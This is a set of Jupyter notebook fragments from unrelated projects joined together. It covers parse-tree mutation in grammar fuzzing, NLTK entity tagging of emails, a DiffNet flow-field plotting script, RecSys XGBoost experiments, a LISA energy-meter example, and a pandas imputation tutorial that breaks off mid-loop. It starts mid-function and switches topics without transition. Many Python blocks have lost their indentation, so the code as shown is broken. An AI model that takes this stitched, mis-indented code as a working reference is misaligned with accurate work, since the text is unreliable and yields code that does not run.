if node == " + ":
node = " - "
elif node == " - ":
node = " + "
return node, children
def apply_mutator(tree, mutator):
node, children = mutator(tree)
return node, [apply_mutator(c, mutator) for c in children]
mutated_tree = apply_mutator(expr_tree, swap_plus_minus)
display_tree(mutated_tree)
```
## Unparsing the Mutated Tree
To unparse, we traverse the tree and look at all terminal symbols:
```
tree_to_string(mutated_tree)
```
## Lots of mutations
```
for i in range(10):
s = expr_fuzzer.fuzz()
s_tree = list(expr_parser.parse(s))[0]
s_mutated_tree = apply_mutator(s_tree, swap_plus_minus)
s_mutated = tree_to_string(s_mutated_tree)
print(' ' + s + '\n-> ' + s_mutated + '\n')
```
## Another Example: JSON
```
import string
CHARACTERS_WITHOUT_QUOTE = (string.digits
+ string.ascii_letters
+ string.punctuation.replace('"', '').replace('\\', '')
+ ' ')
JSON_EBNF_GRAMMAR = {
"<start>": ["<json>"],
"<json>": ["<element>"],
"<element>": ["<ws><value><ws>"],
"<value>": ["<object>", "<array>", "<string>", "<number>", "true", "false", "null"],
"<object>": ["{<ws>}", "{<members>}"],
"<members>": ["<member>(,<members>)*"],
"<member>": ["<ws><string><ws>:<element>"],
"<array>": ["[<ws>]", "[<elements>]"],
"<elements>": ["<element>(,<elements>)*"],
"<element>": ["<ws><value><ws>"],
"<string>": ['"' + "<characters>" + '"'],
"<characters>": ["<character>*"],
"<character>": srange(CHARACTERS_WITHOUT_QUOTE),
"<number>": ["<int><frac><exp>"],
"<int>": ["<digit>", "<onenine><digits>", "-<digits>", "-<onenine><digits>"],
"<digits>": ["<digit>+"],
"<digit>": ['0', "<onenine>"],
"<onenine>": crange('1', '9'),
"<frac>": ["", ".<digits>"],
"<exp>": ["", "E<sign><digits>", "e<sign><digits>"],
"<sign>": ["", '+', '-'],
"<ws>": ["( )*"]
}
assert is_valid_grammar(JSON_EBNF_GRAMMAR)
JSON_GRAMMAR = convert_ebnf_grammar(JSON_EBNF_GRAMMAR)
syntax_diagram(JSON_GRAMMAR)
json_input = '{"conference": "ICSE"}'
json_parser = EarleyParser(JSON_GRAMMAR)
json_tree = list(json_parser.parse(json_input))[0]
display_tree(json_tree)
def swap_venue(tree):
if tree_to_string(tree) == '"ICSE"':
tree = list(json_parser.parse('"ICST"'))[0]
return tree
mutated_tree = apply_mutator(json_tree, swap_venue)
tree_to_string(mutated_tree)
```
```
import pandas as pd
import numpy as np
import re
from itertools import accumulate
emails = pd.read_csv(r'C:\Users\amrenkumar\Desktop\TestData\full-output1.csv')
emails.shape
emails_clean = emails[~emails.interaction_content.isnull()]
emails_clean = emails_clean.interaction_content
emails_clean.drop_duplicates(keep='first', inplace=True)
emails_clean.head()
email_clean= emails_clean.str.replace("[^a-zA-Z0-9. ]", "")
#email_clean= emails_clean.interaction_content.str
for i in email_clean[0:1]:
    print(i)
import nltk
from nltk.tag import pos_tag
from nltk import ne_chunk
nltk.download('averaged_perceptron_tagger')
nltk.download('maxent_ne_chunker')
nltk.download('words')
nltk.download('punkt')
sent_tokens = []
for i in list(email_clean):
    sent_tokens.append(nltk.sent_tokenize(i))
sents = []
for sent in range(len(sent_tokens)):
    for i in range(len(sent_tokens[sent])):
        sents.append(sent_tokens[sent][i])
len(sents)
sents[3]
sents= list(set(sents))
def tokenizer(sent):
    # tokenize a sentence and pair each token with its POS tag
    tokens = nltk.word_tokenize(sent)
    tags = nltk.pos_tag(tokens)
    tag_p = [tag for _, tag in tags]
    data = pd.DataFrame(list(zip(tokens, tag_p)))
    return data
df_final = pd.DataFrame()
for i, sent in enumerate(sents):
    df = tokenizer(sent)
    df['Sent'] = "Sentence:" + str(i)
    df_final = df_final.append(df)
df_final.to_csv('Annotation.csv')
df_final.columns = ['Token','POS','Sent']
df_final = df_final[['Sent','Token','POS']]
from nltk.util import ngrams
grams_list = []
for sent in sents:
    for i in range(5):
        grams_list.extend(list(ngrams(nltk.word_tokenize(sent), i + 1)))
l1 = []
for i in grams_list:
    l1.append(' '.join(i))
company = pd.read_csv('company.csv')
company = company.TYPE.map(lambda x: x.lower())
company[2]
len(l1)
time = pd.read_csv('time.csv')
time = time.Time.map(lambda x: x.lower())
email_tokens_multi_size = [x.lower() for x in l1]
email_tokens_single = [x.lower() for x in l1 if len(x.split())==1]
company_matched = frozenset(company).intersection(email_tokens_multi_size)
len(company_matched)
time_matched = frozenset(time).intersection(email_tokens_multi_size)
currency = pd.read_csv(r'C:\Users\amrenkumar\Desktop\TestData\Currency.csv')
currency = currency.Currency.map(lambda x: x.lower())
currency_matched = frozenset(currency).intersection(email_tokens_multi_size)
len(currency_matched)
location = pd.read_csv(r'C:\Users\amrenkumar\Desktop\TestData\location.csv')
location = location.Location.map(lambda x: x.lower())
location_matched = frozenset(location).intersection(email_tokens_multi_size)
len(location_matched)
def token_annotate(tokens, entity, entity_type):
    # tag each matched n-gram (one to five tokens long) with BIO labels;
    # slicing avoids the IndexError the original per-length checks could
    # raise near the end of the token list
    suffix = {'company': 'org', 'time': 'tim',
              'currency': 'cur', 'location': 'geo'}[entity_type]
    b_entity = ' B-' + suffix
    i_entity = ' I-' + suffix
    tokens_tagged = tokens
    for i in range(len(tokens)):
        for v1 in entity:
            parts = v1.split()
            n = len(parts)
            if 1 <= n <= 5 and tokens[i:i + n] == parts:
                tokens_tagged[i] = tokens[i] + b_entity
                for k in range(1, n):
                    tokens_tagged[i + k] = tokens[i + k] + i_entity
    return tokens_tagged
print(pd.Timestamp.now())
t = token_annotate(email_tokens_single, time_matched, 'time')
print(pd.Timestamp.now())
len(email_tokens_single)
t_company = token_annotate(t, company_matched, 'company')
print(pd.Timestamp.now())
t_currency = token_annotate(t_company, currency_matched, 'currency')
t_location = token_annotate(t_currency, location_matched, 'location')
t1 = []
for i in t_location:
    t1.append(i.split())
t1
tagged_Tokens = pd.DataFrame(t1, columns=['Token','Tag', 'Tag1'])
tagged_Tokens.drop('Tag1', axis=1, inplace=True)
tagged_Tokens.Tag = tagged_Tokens.Tag.fillna('O')
df_annotated_final = pd.concat([df_final.reset_index(drop=True),
tagged_Tokens["Tag"].reset_index(drop=True)], axis=1)
df_annotated_final.loc[(df_annotated_final.Tag=='B-geo') & (df_annotated_final.Token=='strong') , ['Tag']] = 'O'
df_annotated_final.to_csv('df_annotated.csv')
df_annotated_final.head()
df_annotated_final.shape
df_annotated_final[df_annotated_final.Tag!='O'].shape
sents[10]
df_annotated_final = pd.read_csv('df_annotated.csv')
set(df_annotated_final.Tag)
df_annotated_final.loc[(df_annotated_final.Tag=='B-cur') , ['Tag']] = 'O'
df_annotated_final.to_csv('df_annotated.csv')
sents_with_tags = list(set(df_annotated_final[df_annotated_final.Tag!='O'].Sent))
len(sents_with_tags)
df_annotated_final_clean = df_annotated_final[df_annotated_final['Sent'].isin(sents_with_tags)].copy()  # define before use; .copy() avoids SettingWithCopyWarning below
set(df_annotated_final_clean.Tag)
df_annotated_final_clean.shape
df_annotated_final.shape
df_annotated_final_clean.to_csv('df_annotated.csv')
df_annotated_final_clean.loc[(df_annotated_final_clean.Tag=='I-org') , ['Tag']] = 'I-comp'
df_annotated_final_clean
```
```
import os
import sys
import math
import json
import torch
import PIL
import numpy as np
from tqdm import tqdm
import scipy.io
from scipy import ndimage
import matplotlib
# from skimage import io
# matplotlib.use("pgf")
matplotlib.rcParams.update({
# 'font.family': 'serif',
'font.size':8,
})
from matplotlib import pyplot as plt
import pytorch_lightning as pl
from pytorch_lightning import Trainer, seed_everything
from pytorch_lightning.loggers import TensorBoardLogger
seed_everything(42)
import DiffNet
from DiffNet.DiffNetFEM import DiffNet2DFEM
from torch.utils import data
from DiffNet.networks.autoencoders import AE
# from e1_stokes_base_resmin import Stokes2D
from pytorch_lightning.callbacks.base import Callback
torch.set_printoptions(precision=10)
from e2_ns_fpc_embedded_airfoil import NS_FPC_Dataset, NS_FPC, OptimSwitchLBFGS
image_dataset_dir = '../test-dataset-fpc'
dirname = './ns_fpc_af/version_4/selected_query_inputs'
case_dir = './ns_fpc_af/version_4'
query_out_path = os.path.join(case_dir, 'selected_query_outputs')
if not os.path.exists(query_out_path):
os.makedirs(query_out_path)
mapping_type = 'network'
lx = 5.
ly = 12.
Nx = 256
Ny = 128
domain_size = 128
Re = 1.
dir_string = "ns_fpc_af"
max_epochs = 50001
plot_frequency = 1
LR = 2e-4
opt_switch_epochs = max_epochs
load_from_prev = False
load_version_id = 37
enable_progress_bar = True
# print("argv = ", sys.argv)
# if len(sys.argv) > 1:
# enable_progress_bar = bool(int(sys.argv[1]))
# print("enable_progress_bar = ", enable_progress_bar)
x = np.linspace(0, 1, Nx)
y = np.linspace(0, 1, Ny)
xx , yy = np.meshgrid(x, y)
net_u = torch.load(os.path.join(case_dir, 'net_u.pt'))
net_v = torch.load(os.path.join(case_dir, 'net_v.pt'))
net_p = torch.load(os.path.join(case_dir, 'net_p.pt'))
net_u.to('cpu')
net_v.to('cpu')
net_p.to('cpu')
dataset = NS_FPC_Dataset(dirname=image_dataset_dir, domain_lengths=(lx,ly), domain_sizes=(Nx,Ny), Re=Re)
network = (net_u, net_v, net_p)
basecase = NS_FPC(network, dataset, domain_lengths=(lx,ly), domain_sizes=(Nx,Ny), batch_size=32, fem_basis_deg=1, learning_rate=LR, plot_frequency=plot_frequency, mapping_type=mapping_type)
#network = GoodNetwork(in_channels=2, out_channels=1, in_dim=64, out_dim=64)
# basecase = Poisson(network, dataset, batch_size=16, domain_size=256)
nsample = len(basecase.dataset)
print("nsample = ", nsample)
# def do_query(net_u, net_v, net_p, inputs_tensor, forcing_tensor):
# domain = inputs_tensor[:,5:6,:,:].type_as(next(self.net_u.parameters()))
# u = net_u(domain)
# v = net_v(domain)
# p = net_p(domain)
# # extract diffusivity and boundary conditions here
# x = inputs_tensor[:,0:1,:,:]
# y = inputs_tensor[:,1:2,:,:]
# bc1 = inputs_tensor[:,2:3,:,:]
# bc2 = inputs_tensor[:,3:4,:,:]
# bc3 = inputs_tensor[:,4:5,:,:]
# domain = inputs_tensor[:,5:6,:,:]
# # apply boundary conditions
# u_bc = self.u_bc.unsqueeze(0).unsqueeze(0).type_as(u)
# v_bc = self.v_bc.unsqueeze(0).unsqueeze(0).type_as(u)
# p_bc = self.p_bc.unsqueeze(0).unsqueeze(0).type_as(u)
# u = torch.where(bc1>=0.5, u_bc, u)
# u = torch.where(domain<0.5, domain, u)
# v = torch.where(bc2>=0.5, v_bc, v)
# v = torch.where(domain<0.5, domain, v)
# # p = torch.where(bc3>=0.5, p_bc, p)
# return u, v, p
next(net_u.parameters()).device
with torch.no_grad():
for i in range(nsample//10+1):
id0 = 10*i
id1 = id0+10
if id1 > nsample:
id1 = nsample
# core query code
inputs, forcing = basecase.dataset[id0:id1]
u, v, p, u_x_gp, v_y_gp = basecase.do_query(inputs, forcing)
# query_plot_contours_and_save(query_out_path, nu_par_list, f_par_list, u_par_list, i)
u = u.squeeze().cpu()
v = v.squeeze().cpu()
p = p.squeeze().cpu()
        # plot each sample in this batch; use a separate index so we don't
        # shadow the batch loop's variable i, and index only within the batch
        for j in range(id1 - id0):
            ui = u[j]
            vi = v[j]
            pi = p[j]
            # plotting
            plt_num_row = 1
            plt_num_col = 3
            fig, axs = plt.subplots(plt_num_row, plt_num_col, figsize=(5*plt_num_col, 10*plt_num_row),
                                    subplot_kw={'aspect': 'auto'}, sharex=True, sharey=True, squeeze=True)
            for ax in axs:
                ax.set_xticks([])
                ax.set_yticks([])
            im0 = axs[0].imshow(ui, cmap='jet')
            cb = fig.colorbar(im0, ax=axs[0], fraction=0.04, pad=0.1, orientation="horizontal")
            cb.set_ticks([0, 1])
            cb.set_ticklabels([0, 1])
            im1 = axs[1].imshow(vi, cmap='jet')
            fig.colorbar(im1, ax=axs[1], fraction=0.04, pad=0.1, orientation="horizontal")
            im2 = axs[2].imshow(pi, cmap='jet')
            fig.colorbar(im2, ax=axs[2], fraction=0.04, pad=0.1, orientation="horizontal")
            plt.savefig(os.path.join(query_out_path, 'q_' + str(id0 + j) + '.png'))
            plt.show()
plt.show()
nsample
iii, fff = basecase.dataset[0:2]
iii.shape
fff.shape
from DiffNet.networks.resnets import ResNet
from DiffNet.networks.unets import UNetRes
rn = ResNet(in_channels=1, out_channels=1, num_hidden_features=2, n_resblocks=5)
# gn = GoodNetwork(in_channels=1, out_channels=1, in_dim=64, out_dim=64)  # GoodNetwork is not imported here, so this line would raise a NameError
```
```
import utils.model
import pandas as pd
import utils.constants
import sklearn
import numpy as np
train_data = pd.read_parquet("preprocessed_training_features\\part.0.parquet")
test_data = pd.read_parquet("preprocessed_validation_features\\part.1.parquet")
feature_columns_w_TE = ['a_is_verified', 'b_is_verified',
'a_follows_b', 'bert_token_len',
'n_photos', 'n_videos', 'n_gifs',
'type_encoding', 'language_encoding', 'a_followers', 'a_following',
'b_followers', 'b_following', 'day_of_week', 'hour_of_day',
'b_creation_delta', 'a_creation_delta', 'TE_language_encoding_has_reply',
'TE_language_encoding_has_like',
'TE_language_encoding_has_retweet_comment',
'TE_language_encoding_has_retweet', 'TE_type_encoding_has_reply',
'TE_type_encoding_has_like', 'TE_type_encoding_has_retweet_comment',
'TE_type_encoding_has_retweet', 'TE_a_hash_has_reply',
'TE_a_hash_has_like', 'TE_a_hash_has_retweet_comment',
'TE_a_hash_has_retweet', 'TE_b_hash_has_reply', 'TE_b_hash_has_like',
'TE_b_hash_has_retweet_comment', 'TE_b_hash_has_retweet',
'TE_tweet_hash_has_reply', 'TE_tweet_hash_has_like',
'TE_tweet_hash_has_retweet_comment', 'TE_tweet_hash_has_retweet']
feature_columns_wo_TE = ['a_is_verified', 'b_is_verified',
'a_follows_b', 'bert_token_len',
'n_photos', 'n_videos', 'n_gifs',
'type_encoding', 'language_encoding', 'a_followers', 'a_following',
'b_followers', 'b_following', 'day_of_week', 'hour_of_day',
'b_creation_delta', 'a_creation_delta']
def random_mask_columns(df, columns, prob=0.75):
    # randomly set ~prob fraction of the rows in the given columns to -1
    inds = np.random.binomial(1, prob, size=len(df)).astype(bool)
    df.loc[inds, columns] = -1  # assign via .loc to avoid SettingWithCopyWarning
    return df
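# Hypothetical quick check of the masking helper on a toy frame:
# with prob=1.0 every row of the chosen columns should become -1,
# while untouched columns keep their values
_demo = pd.DataFrame({'x': [1.0, 2.0, 3.0], 'y': [4.0, 5.0, 6.0]})
_demo = random_mask_columns(_demo, ['x'], prob=1.0)
print(_demo['x'].tolist())  # -> [-1.0, -1.0, -1.0]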
train_data = random_mask_columns(train_data, ['TE_a_hash_has_reply','TE_a_hash_has_like', 'TE_a_hash_has_retweet_comment','TE_a_hash_has_retweet'])
train_data = random_mask_columns(train_data, ['TE_b_hash_has_reply', 'TE_b_hash_has_like','TE_b_hash_has_retweet_comment', 'TE_b_hash_has_retweet'])
train_data = random_mask_columns(train_data, ['TE_tweet_hash_has_reply', 'TE_tweet_hash_has_like','TE_tweet_hash_has_retweet_comment', 'TE_tweet_hash_has_retweet'])
recsysxgb = utils.model.RecSysXGB1()
xgb_params = {'objective': 'binary:logistic', 'eval_metric':'map'}
recsysxgb.train_in_memory(train_data, feature_columns_w_TE, xgb_params, save_dir = "xgb_models_02")#add random mask for train data.
import matplotlib.pyplot as plt
like_preds = recsysxgb.infer(test_data, feature_columns_w_TE)[3].round()
print(sklearn.metrics.balanced_accuracy_score(test_data["has_like"]*1, like_preds))
print(sklearn.metrics.precision_score(test_data["has_like"]*1 , like_preds))
sklearn.metrics.ConfusionMatrixDisplay(sklearn.metrics.confusion_matrix(test_data["has_like"]*1, like_preds)).plot()
plt.show()
recsysxgb = utils.model.RecSysXGB1()
xgb_params = {'objective': 'binary:logistic', 'eval_metric':'map'}
recsysxgb.train_in_memory(train_data, feature_columns_wo_TE, xgb_params, save_dir = "xgb_models_02")#add random mask for train data.
import matplotlib.pyplot as plt
like_preds = recsysxgb.infer(test_data, feature_columns_wo_TE)[3].round()
print(sklearn.metrics.balanced_accuracy_score(test_data["has_like"]*1, like_preds))
print(sklearn.metrics.precision_score(test_data["has_like"]*1 , like_preds))
sklearn.metrics.ConfusionMatrixDisplay(sklearn.metrics.confusion_matrix(test_data["has_like"]*1, like_preds)).plot()
plt.show()
from utils.dataloader import RecSys2021PandasDataLoader
val_loader = RecSys2021PandasDataLoader(test_data, feature_columns_w_TE, mode = "validation")
res = recsysxgb.evaluate_validation_set(val_loader)
res
# assuming res holds one (AP, RCE) pair per engagement target
print(f"AP Reply: {res[0][0]} - RCE Reply: {res[0][1]}")
print(f"AP Retweet: {res[1][0]} - RCE Retweet: {res[1][1]}")
print(f"AP Retweet w/ comment: {res[2][0]} - RCE Retweet w/ comment: {res[2][1]}")
print(f"AP Like: {res[3][0]} - RCE Like: {res[3][1]}")
recsysxgb.clfs_["has_reply"].get_score(importance_type="gain")
pd.read_csv("simple_pandas_run\\results.csv", header=None)
#f2 = f2.drop(["reply","retweet","retweet_comment","like"], axis=1)
#f2.head()  # f2 is only defined in the commented-out line above
import pandas as pd
train = pd.read_parquet("preprocessed_training_features\\part.9.parquet")
test = pd.read_parquet("preprocessed_validation_features\\part.9.parquet")
train
train[train["b_user_id"] == '7F6C55FBCE9A4FB981B1DF01807C121B']["b_hash"]
test[test["b_user_id"] == '7F6C55FBCE9A4FB981B1DF01807C121B']["b_hash"]
import numpy as np
np.array([int(str(int("7F6C55FBCE9A4FB981B1DF01807C121B", 16))[:20])], dtype=np.uint64)
import ast
ast.literal_eval('0x7F6C55FBCE9A4FB981B1DF01807C121B')
int("7F6C55FBCE9A4FB981B1DF01807C121B", 16)%(2**32)
train.columns
test_data.columns
test_data
```
# Energy Meter Examples
## Linux Kernel HWMon
More details can be found at https://github.com/ARM-software/lisa/wiki/Energy-Meters-Requirements#linux-hwmon.
```
import logging
from conf import LisaLogging
LisaLogging.setup()
```
#### Import required modules
```
# Generate plots inline
%matplotlib inline
import os
# Support to access the remote target
import devlib
from env import TestEnv
# RTApp configurator for generation of PERIODIC tasks
from wlgen import RTA, Ramp
```
## Target Configuration
The target configuration is used to describe and configure your test environment.
You can find more details in **examples/utils/testenv_example.ipynb**.
```
# Setup target configuration
my_conf = {
# Target platform and board
"platform" : 'linux',
"board" : 'juno',
"host" : '192.168.0.1',
# Devlib modules to load
"modules" : ["cpufreq"], # Required by rt-app calibration
# Folder where all the results will be collected
"results_dir" : "EnergyMeter_HWMON",
# Energy Meters Configuration for BayLibre's ACME Cape
"emeter" : {
"instrument" : "hwmon",
"conf" : {
# Prefixes of the HWMon labels
'sites' : ['a53', 'a57'],
# Type of hardware monitor to be used
'kinds' : ['energy']
},
'channel_map' : {
'LITTLE' : 'a53',
'big' : 'a57',
}
},
# Tools required by the experiments
"tools" : [ 'trace-cmd', 'rt-app' ],
# Comment this line to calibrate RTApp in your own platform
# "rtapp-calib" : {"0": 360, "1": 142, "2": 138, "3": 352, "4": 352, "5": 353},
}
# Initialize a test environment using:
te = TestEnv(my_conf, wipe=False, force_new=True)
target = te.target
```
## Workload Execution and Power Consumption Sampling
Detailed information on RTApp can be found in **examples/wlgen/rtapp_example.ipynb**.
Each **EnergyMeter** derived class has two main methods: **reset** and **report**.
- The **reset** method will reset the energy meter and start sampling from channels specified in the target configuration. <br>
- The **report** method will stop the capture and retrieve the energy consumption data. This returns an EnergyReport composed of the measured channels' energy and the report file. Each of the samples can also be obtained, as you can see below.
```
# Create an RTApp RAMP task
rtapp = RTA(te.target, 'ramp', calibration=te.calibration())
rtapp.conf(kind='profile',
params={
'ramp' : Ramp(
start_pct = 60,
end_pct = 20,
delta_pct = 5,
time_s = 0.5).get()
})
# EnergyMeter Start
te.emeter.reset()
rtapp.run(out_dir=te.res_dir)
# EnergyMeter Stop and samples collection
nrg_report = te.emeter.report(te.res_dir)
logging.info("Collected data:")
!tree $te.res_dir
```
## Power Measurements Data
```
logging.info("Measured channels energy:")
logging.info("%s", nrg_report.channels)
logging.info("Generated energy file:")
logging.info(" %s", nrg_report.report_file)
!cat $nrg_report.report_file
```
### Nullity Dataframe
- Use either .isnull() or .isna()
### Total missing values
- .sum()
### Percentage of missingness
- .mean() * 100
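As a minimal illustration of these three steps chained together (the toy column names below are made up for the example):

```python
import numpy as np
import pandas as pd

df = pd.DataFrame({'Ozone': [41, np.nan, 12], 'Wind': [np.nan, np.nan, 12.6]})
print(df.isnull())               # nullity DataFrame: True where a value is missing
print(df.isnull().sum())         # total missing values per column
print(df.isnull().mean() * 100)  # percentage of missingness per column
```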
### Graphical analysis of missing data - missingno package
```python
import missingno as msno
msno.bar(data) # visualize completeness of the dataframe
msno.matrix(airquality) # describes the nullity in the dataset and appears blank wherever there are missing values
msno.matrix(data, freq='M') # monthwise missing data
msno.matrix(data.loc['May-1976':'Jul-1976'], freq='M') # fine tuning
```
### Analyzing missingness percentage
- Before jumping into treating missing data, it is essential to analyze the various factors surrounding it. The elementary step is to measure the amount of missingness, that is, the number of values missing for each variable.
```
import pandas as pd
# Load the airquality dataset
airquality = pd.read_csv('./../data/air-quality.csv', parse_dates=['Date'], index_col='Date')
# Create a nullity DataFrame airquality_nullity
airquality_nullity = airquality.isnull()
print(airquality_nullity.head())
# Calculate total of missing values
missing_values_sum = airquality_nullity.sum()
print('Total Missing Values:\n', missing_values_sum)
# Calculate percentage of missing values
missing_values_percent = airquality_nullity.mean() * 100
print('Percentage of Missing Values:\n', missing_values_percent)
```
### Visualize missingness
```
# Import missingno as msno
import missingno as msno
import matplotlib.pyplot as plt
%matplotlib inline
# Plot amount of missingness
msno.bar(airquality)
# Display bar chart of missing values
# display("bar_chart.png")
# Plot nullity matrix of airquality
msno.matrix(airquality)
# Plot nullity matrix of airquality with frequency 'M'
msno.matrix(airquality, freq='M')
# Plot the sliced nullity matrix of airquality with frequency 'M'
msno.matrix(airquality.loc['May-1976':'Jul-1976'], freq='M')
```
## Mean , Median, Mode Imputation
```python
from sklearn.impute import SimpleImputer
diabetes_mean = diabetes.copy(deep=True)
mean_imputer = SimpleImputer(strategy='mean')
diabetes_mean.iloc[:,:] = mean_imputer.fit_transform(diabetes_mean)
# for median -> strategy='median' for mode -> strategy='most_frequent'
constant_imputer = SimpleImputer(strategy = 'constant', fill_value = 0)
```
### Visualizing imputations
```python
fig, axes = plt.subplots(nrows=2, ncols=2, figsize=(10, 10))
nullity = diabetes['Serum_Insulin'].isnull()+diabetes['Glucose'].isnull()
imputations = {'Mean Imputation':diabetes_mean,
'Median Imputation':diabetes_median,
'Mode Imputation':diabetes_mode,
               'Constant Imputation': diabetes_constant}
for ax, df_key in zip(axes.flatten(), imputations):
# the flatten() method on axes flattens the axes array from (2,2) to (4,1)
# set 'colorbar=False' so that the color bar is not plotted
imputations[df_key].plot(x='Serum_Insulin', y='Glucose', kind='scatter', alpha=0.5, c=nullity, cmap='rainbow', ax=ax, colorbar=False, title=df_key)
```
- Observing the graph, there's a clear correlation between 'Serum_Insulin' and 'Glucose'. However, the imputed values (shown in red) lie along a straight line, since they do not vary with the other variable.
- **Therefore, we can conclude that mean, median and mode imputations preserve only basic statistical features of the dataset and don't account for correlations between variables.** Moreover, this introduces bias into the dataset.
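This shrinkage can be checked numerically on a toy column (the series below is made up for illustration): mean imputation leaves the column mean unchanged but reduces its spread.

```python
import numpy as np
import pandas as pd
from sklearn.impute import SimpleImputer

s = pd.Series([1.0, 2.0, np.nan, 4.0, np.nan, 9.0])
filled = pd.Series(SimpleImputer(strategy='mean').fit_transform(s.to_frame()).ravel())
print(s.mean(), filled.mean())  # mean is preserved: 4.0 -> 4.0
print(s.std() > filled.std())   # standard deviation shrinks: True
```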
### Mean & median imputation
- Imputing missing values is the best method when you have large amounts of data to deal with. The simplest methods to impute missing values include filling in a constant or the mean of the variable or other basic statistical parameters like median and mode.
```
diabetes = pd.read_csv('./../data/pima-indians-diabetes data.csv')
diabetes.head()
from sklearn.impute import SimpleImputer
# Make a copy of diabetes
diabetes_mean = diabetes.copy(deep=True)
# Create mean imputer object
mean_imputer = SimpleImputer(strategy='mean')
# Impute mean values in the DataFrame diabetes_mean
diabetes_mean.iloc[:, :] = mean_imputer.fit_transform(diabetes_mean)
# Make a copy of diabetes
diabetes_median = diabetes.copy(deep=True)
# Create median imputer object
median_imputer = SimpleImputer(strategy='median')
# Impute median values in the DataFrame diabetes_median
diabetes_median.iloc[:, :] = median_imputer.fit_transform(diabetes_median)
```
### Mode and constant imputation
```
# Make a copy of diabetes
diabetes_mode = diabetes.copy(deep=True)
# Create mode imputer object
mode_imputer = SimpleImputer(strategy='most_frequent')
# Impute using most frequent value in the DataFrame mode_imputer
diabetes_mode.iloc[:, :] = mode_imputer.fit_transform(diabetes_mode)
# Make a copy of diabetes
diabetes_constant = diabetes.copy(deep=True)
# Create constant imputer object
constant_imputer = SimpleImputer(strategy='constant', fill_value=0)
# Impute missing values to 0 in diabetes_constant
diabetes_constant.iloc[:, :] = constant_imputer.fit_transform(diabetes_constant)
```
### Visualize imputations
- Analyzing imputations and choosing the best one, is a task that requires lots of experimentation. It is important to make sure that our data does not become biased while imputing. We created 4 different imputations using mean, median, mode, and constant filling imputations.
- We'll create a scatterplot of the DataFrames we imputed previously. To achieve this, we'll create a dictionary of the DataFrames with the keys being their title.
```
import matplotlib.pyplot as plt
%matplotlib inline
# Set nrows and ncols to 2
fig, axes = plt.subplots(nrows=2, ncols=2, figsize=(10, 10))
nullity = diabetes.Serum_Insulin.isnull()+diabetes.Glucose.isnull()
# Create a dictionary of imputations
imputations = {'Mean Imputation': diabetes_mean, 'Median Imputation': diabetes_median,
'Most Frequent Imputation': diabetes_mode, 'Constant Imputation': diabetes_constant}
# Loop over flattened axes and imputations
for ax, df_key in zip(axes.flatten(), imputations):
# Select and also set the title for a DataFrame
imputations[df_key].plot(x='Serum_Insulin', y='Glucose', kind='scatter',
alpha=0.5, c=nullity, cmap='rainbow', ax=ax,
colorbar=False, title=df_key)
plt.show()
```
- Notice how these imputations are portrayed as a straight line and don't adjust to the shape of the data
# Imputing using fancyimpute
- fancyimpute is a package containing several advanced imputation techniques that use machine learning algorithms to impute missing values.
- In mean, median, mode imputations only the respective column was utilized for computing and imputing missing values.
- In contrast, the advanced imputation techniques use other columns as well to predict the missing values and impute them. Think of it as fitting a ML model to predict the missing values in a column using the remaining columns.
- **KNN imputation** : find the most similar data points using all the non-missing features for a data point and calculates the average of these similar points to fill the missing feature. Here K specifies the number of similar or nearest points to consider.
```python
from fancyimpute import KNN
knn_imputer = KNN()
diabetes_knn = diabetes.copy(deep=True)
diabetes_knn.iloc[:,:] = knn_imputer.fit_transform(diabetes_knn)
```
#### Multiple Imputations by Chained Equations (MICE)
- Perform multiple regression over random sample of the data
- Take average of the multiple regression values
- Impute the missing feature value for the data point
- The MICE function is called 'IterativeImputer' in the fancyimpute package as it performs multiple imputations on the data.
```python
from fancyimpute import IterativeImputer
MICE_imputer = IterativeImputer()
diabetes_MICE = diabetes.copy(deep=True)
diabetes_MICE.iloc[:,:] = MICE_imputer.fit_transform(diabetes_MICE)
```
## KNN imputation
- **Datasets always have features which are correlated. Hence, it becomes important to consider them as a factor for imputing missing values**. Machine learning models use features in the DataFrame to find correlations and patterns and predict a selected feature.
- One of the simplest and most efficient models is the K Nearest Neighbors. It finds 'K' points most similar to the existing data points to impute missing values.
```
diabetes = pd.read_csv('./../data/pima-indians-diabetes data.csv')
diabetes.head()
diabetes.isnull().sum()
# Import KNN from fancyimpute
from fancyimpute import KNN
# Copy diabetes to diabetes_knn_imputed
diabetes_knn_imputed = diabetes.copy(deep=True)
# Initialize KNN
knn_imputer = KNN()
# Impute using fit_tranform on diabetes_knn_imputed
diabetes_knn_imputed.iloc[:, :] = knn_imputer.fit_transform(diabetes_knn_imputed)
diabetes_knn_imputed.isnull().sum()
```
# MICE imputation
- Here, we will use IterativeImputer, popularly called MICE, for imputing missing values. The IterativeImputer performs multiple regressions on random samples of the data and aggregates the results to impute the missing values.
```
diabetes = pd.read_csv('./../data/pima-indians-diabetes data.csv')
diabetes.head()
# Import IterativeImputer from fancyimpute
from fancyimpute import IterativeImputer
# Copy diabetes to diabetes_mice_imputed
diabetes_mice_imputed = diabetes.copy(deep=True)
# Initialize IterativeImputer
mice_imputer = IterativeImputer()
# Impute using fit_tranform on diabetes
diabetes_mice_imputed.iloc[:, :] = mice_imputer.fit_transform(diabetes)
diabetes_mice_imputed.isnull().sum()
```
## Imputing categorical values
- The complexity with categorical data is that they are usually strings. Hence imputations cannot be applied on them. The categorical values must first be converted or encoded to numeric values and then imputed.
- For converting categories to numeric values we need to encode the categories using ordinal encoder or one-hot encoder.
## Imputation techniques
- Simplest way is to just fill with most frequent category.
- Impute using statistical models like KNN
- Ordinal encoding cannot handle NaNs, so encode only the non-null values and then impute the missing ones.
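The encode → impute → decode round trip below relies on `OrdinalEncoder` being invertible; a minimal standalone sketch:

```python
import numpy as np
from sklearn.preprocessing import OrdinalEncoder

enc = OrdinalEncoder()
labels = np.array([['low'], ['high'], ['medium'], ['high']])
codes = enc.fit_transform(labels)        # categories -> numeric codes (categories sorted alphabetically)
restored = enc.inverse_transform(codes)  # numeric codes -> original labels
print(codes.ravel())     # [1. 0. 2. 0.]
print(restored.ravel())  # ['low' 'high' 'medium' 'high']
```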
### Ordinal Encoding
```python
from sklearn.preprocessing import OrdinalEncoder
# create Ordinal Encoder
ambience_ord_enc = OrdinalEncoder()
# select non-null values in ambience
ambience = users['ambience']
ambience_not_null = ambience[ambience.notnull()]
reshaped_vals = ambience_not_null.values.reshape(-1, 1)
# encode the non-null values of ambience
encoded_vals = ambience_ord_enc.fit_transform(reshaped_vals)
# replace the ambience column with ordinal values
users.loc[ambience.notnull(), 'ambience'] = np.squeeze(encoded_vals)
# generalized form for conversion by looping over the columns
# create a dictionary for ordinal encoders
ordinal_enc_dict = {}
# loop over columns to encode
for col_name in users:
# create ordinal encoder for the column
